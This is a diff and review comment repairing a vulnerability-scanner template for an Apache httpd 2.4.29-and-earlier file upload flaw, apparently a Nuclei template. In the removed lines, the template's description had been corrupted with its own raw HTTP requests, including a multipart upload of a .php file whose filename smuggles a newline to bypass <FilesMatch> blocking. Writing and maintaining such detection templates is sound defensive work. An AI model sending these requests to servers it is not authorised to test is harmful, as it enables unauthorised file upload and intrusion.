misc format fixes

patch-1
sandeep 2023-12-12 17:29:52 +05:30
parent 3961cfc660
commit bed51ef8b5
1 changed files with 2 additions and 30 deletions

@ -4,36 +4,8 @@ info:
name: Apache httpd <=2.4.29 - Arbitrary File Upload
author: geeknik
severity: high
description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in <FilesMatch>, which could match '
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ
------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
{{randstr_1}}
------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="name"
{{randstr}}.php\x0A
------WebKitFormBoundaryKc8fBVDo558U4hbJ--
- |
GET /{{randstr}}.php\x0A HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip,deflate
Accept: */*
matchers:
- type: dsl
dsl:
- 'contains(body_2, "{{randstr_1}}")'
# digest: 4b0a00483046022100af8962fbdb45cc4ff2bc412d3c73e1b707e524f8519921ef714fa539b773e3e3022100de4b291e6b8d8f658fe84fda467200476d0f45862a519b81135840f172189cf6:922c64590222798bb761d5b6d8e72950 to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
description: |
Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in <FilesMatch>, which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
remediation: |
Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches.
reference:
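
Review bot: The old single-line `description:` had the rest of the template spliced into it right after `could match '`, exactly where the literal `'$'` belongs: the `http:` raw requests, the `dsl` matcher and a `# digest:` comment all sit inside the description text. That makes this a content repair rather than a format fix, and the commit message should say so. The replacement `description: |` block scalar keeps `'$'` and `<FilesMatch>` literal, which is the right form. Two things to confirm before merging: that the `http:` section and matcher still appear exactly once further down the file, since the hunk goes from 36 lines to 8 and stops at `reference:`; and that the template's trailing digest was regenerated, because the signed content changed. The splice point is consistent with `$'` having been expanded by a string-replace call (a guess from the visible text, not something the diff shows), so it is worth searching other templates whose descriptions contain `$'` or `$&` for the same damage.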